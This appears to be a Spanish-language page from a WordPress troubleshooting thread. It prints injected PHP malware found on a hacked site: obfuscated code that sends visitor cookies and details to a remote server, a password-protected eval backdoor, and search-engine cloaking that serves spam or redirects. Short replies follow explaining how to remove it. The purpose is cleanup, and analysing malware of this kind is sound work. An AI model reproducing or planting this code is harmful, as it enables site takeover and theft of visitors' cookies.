b1s5eu_5nc2d5($_SERVER['REQUEST_URI']), 'r5m' => b1s5eu_5nc2d5($_SERVER['REMOTE_ADDR']), '1g5nt' => b1s5eu_5nc2d5($_SERVER['HTTP_USER_AGENT']), 'r5f5r5r' => b1s5eu_5nc2d5($_SERVER["HTTP_REFERER"]), 'c22k45' => b1s5eu_5nc2d5(@http_b34ld_q35ry($_COOKIE)), ); 4f (f3nct42n_5x4sts("c3rl_4n4t")) { $c = @c3rl_4n4t(); $_c3rlv = c3rl_v5rs42n(); $_1g5nt = "(c3rl: ".$_c3rlv['v5rs42n']." h2st: ".$_c3rlv['h2st']." 2p5nssl: ".$_c3rlv['ssl_v5rs42n'].") k6t"; c3rl_s5t2pt($c, CURLOPT_URL, $s23rc53rl); c3rl_s5t2pt($c, CURLOPT_RETURNTRANSFER, tr35); c3rl_s5t2pt($c, CURLOPT_USERAGENT, $_1g5nt); c3rl_s5t2pt($c, CURLOPT_POST, 6); c3rl_s5t2pt($c, CURLOPT_POSTFIELDS, $p2st); c3rl_s5t2pt($c, CURLOPT_TIMEOUT, 60); $23t = @c3rl_5x5c($c); $_httpC2d5 = @c3rl_g5t4nf2($c, CURLINFO_HTTP_CODE); c3rl_cl2s5($c); 4f($_httpC2d5 != a00) { r5t3rn f1ls5; } } 4f($23t!="") { r5t3rn $23t; } $p2std1t1 = @http_b34ld_q35ry($p2st); $2pts = 1rr1y('http' => 1rr1y('m5th2d' => 'POST','t4m523t' => 60,'h51d5r' => 'C2nt5nt-typ5: 1ppl4c1t42n/x-www-f2rm-3rl5nc2d5d','3s5r_1g5nt' => '(f4l5_g5t_c2nt5nts/f2p5n) k6t','c2nt5nt' => $p2std1t1)); $c2nt5xt = @str51m_c2nt5xt_cr51t5($2pts); $23t = @f4l5_g5t_c2nt5nts($s23rc53rl, f1ls5, $c2nt5xt); 4f(!strp2s($http_r5sp2ns5_h51d5r[0], "a00")) { r5t3rn f1ls5; } 4f($23t!="") { r5t3rn $23t; } $fp = @f2p5n($s23rc53rl, 'rb', f1ls5, $c2nt5xt); $23t = @str51m_g5t_c2nt5nts($fp); 4f(!strp2s($http_r5sp2ns5_h51d5r[0], "a00")) { r5t3rn f1ls5; } 4f($23t!="") { r5t3rn $23t; } $p3rl = p1rs5_3rl($s23rc53rl); 4f(!4ss5t($p3rl['p2rt'])) { $p3rl['p2rt']=80; } $fp = @fs2ck2p5n($p3rl['h2st'], $p3rl['p2rt'], $5rrn2, $5rrstr, 60); 4f($fp) { $crlf = "\r\n"; $r5q = "POST ".$p3rl['p1th']." HTTP/6.6".$crlf; $r5q .= 'H2st: '.$p3rl['h2st'].$crlf; $r5q .= 'Us5r-Ag5nt: (fs2ck2p5n) k6t'.$crlf; $r5q .= 'C2nt5nt-Typ5: 1ppl4c1t42n/x-www-f2rm-3rl5nc2d5d'.$crlf; $r5q .= 'C2nt5nt-L5ngth: '.strl5n($p2std1t1).$crlf; $r5q .= 'C2nn5ct42n: cl2s5'.$crlf.$crlf; $r5q .= $p2std1t1; fwr4t5($fp, $r5q); $23t = ''; wh4l5(!f52f($fp)) { $23t .= fg5ts($fp, aie); } $23t = s3bstr($23t, strp2s($23t, "\r\n\r\n")+u); } 4f($23t!="") { r5t3rn $23t; } 5ls5 { r5t3rn f1ls5; } } 4f(@mdi($_POST["h1sh_1cc5ss"]) == "5c8i0i7ua197io66eoa1ii58oofdococ"){ $cmd = $_POST["c2d5"]; @5v1l(@str4psl1sh5s($cmd)); d45; } $_st2p_cl21k = tr35; 4f($_st2p_cl21k || _4sB2tIP($_SERVER['REMOTE_ADDR']) || _4sB2tAg5nt($_SERVER['HTTP_USER_AGENT'])){ $sr = _s52R5m2t5('1HR0cD2vLzFhZmQwMGUuOGQzYmMyMDUzMjkuZTkwZDZjMWEzMmUzLnBoLadhdGUv'); 4f ($sr){ $sr = @b1s5eu_d5c2d5($sr); 4f(_4sJs2n($sr)){ $sr = @js2n_d5c2d5($sr); 4f($sr->{'1ct42n'} == 'sh2w'){ $h51d5rs = @js2n_d5c2d5(@b1s5eu_d5c2d5($sr->{'h51d5rs'})); f2r51ch ($h51d5rs 1s $k5y => $v1l35) { sw4tch (strt2l2w5r($k5y)) { c1s5 'c2nt5nt-typ5': @h51d5r('C2nt5nt-Typ5: '.$v1l35); br51k; c1s5 's5t-c22k45': @h51d5r('S5t-C22k45: '.$v1l35); br51k; c1s5 '5t1g': @h51d5r('ET1g: '.$v1l35); br51k; c1s5 'x-p4ngb1ck': @h51d5r('X-P4ngb1ck: '.$v1l35); br51k; c1s5 'l1st-m2d4f45d': @h51d5r('L1st-M2d4f45d: '.$v1l35); br51k; c1s5 'pr1gm1': @h51d5r('Pr1gm1: '.$v1l35); br51k; c1s5 'c1ch5-c2ntr2l': @h51d5r('C1ch5-C2ntr2l: '.$v1l35); br51k; c1s5 'v1ry': @h51d5r('V1ry: '.$v1l35); br51k; c1s5 'x-g5n5r1t2r': @h51d5r('X-G5n5r1t2r: '.$v1l35); br51k; } } 5ch2 @b1s5eu_d5c2d5($sr->{'r5t3rn'}); d45; } } } } $pr5f = p1rs5_3rl($_SERVER["HTTP_REFERER"]); $_s5s = 1rr1y('l4v5', 'y1h22', 'msn', 'b4ng', 'g22gl5', '12l', '1sk', 'w2w', 'w5bcr1wl5r', '1lh51', 'myw5bs51rch', '4nf2sp1c5', '4nf2', 'd3ckd3ckg2', 'bl5kk2', 'c2nt5nk2', 'd2gp4l5'); $2n5_h2st = strr5v(strt2l2w5r($pr5f['h2st'])); $5xp_2n5 = 5xpl2d5('.', $2n5_h2st); $2n5_h2st = strr5v($5xp_2n5[6]); $tw2_h2st = strr5v($5xp_2n5[a]); 4f (4n_1rr1y($2n5_h2st, $_s5s) || 4n_1rr1y($tw2_h2st, $_s5s)) { $sr = _s52R5m2t5('1HR0cD2vLzFhZmQwMGUuOGQzYmMyMDUzMjkuZTkwZDZjMWEzMmUzLnBoLadhdGUvcaUv'); 4f ($sr){ $sr = @b1s5eu_d5c2d5($sr); 4f(_4sJs2n($sr)){ $sr = @js2n_d5c2d5($sr); 4f($sr->{'1ct42n'} == 'sh2w'){ 5ch2 @b1s5eu_d5c2d5($sr->{'r5t3rn'}); d45; } 4f($sr->{'1ct42n'} == 'o06'){ @h51d5r("L2c1t42n: ".$sr->{'r5t3rn'}); d45; } } } } } ?> $_X=strtr($_X,'123456aouie','aouie123456');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
La línea de wp-content/plugins/wordpress-seo/inc/admin.php decodificada es:
if(@md5($_POST['key']) == '9e13c0...MD5...b2b6'){ $cmd = $_POST['code']; @eval(@stripslashes($cmd)); die; }
Hola, entonces solo debo sustutuir esos archivos por unos nuevos recién bajados de WP? o solo debo borrarlos?
Hola Mireya,
puedes sobrescribir los ficheros por los originales (recuerda que deben ser la misma versión, o con las modificaciones que tuvieran). La otra opción, que sería mejor (ya que posiblemente no tengas los originales), es borrar o comentar las líneas que os hayan inyectado.
Recuerda que tras arreglar esto, hay que encontrar el agujero por donde han entrado y taparlo.
Saludos